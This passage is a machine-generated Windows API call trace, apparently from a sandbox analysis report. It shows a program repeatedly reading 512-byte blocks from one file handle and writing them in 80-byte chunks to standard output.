lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.244] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.245] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] GetFileType (hFile=0x4c) returned 0x1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] GetFileType (hFile=0x4c) returned 0x1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] GetFileType (hFile=0x4c) returned 0x1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] GetFileType (hFile=0x4c) returned 0x1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.309] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.309] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] GetFileType (hFile=0x4c) returned 0x1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.310] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.310] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.311] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.311] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.312] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.312] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] GetFileType (hFile=0x4c) returned 0x1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.314] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.314] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] GetFileType (hFile=0x4c) returned 0x1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] GetFileType (hFile=0x4c) returned 0x1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] GetFileType (hFile=0x4c) returned 0x1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] GetFileType (hFile=0x4c) returned 0x1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType 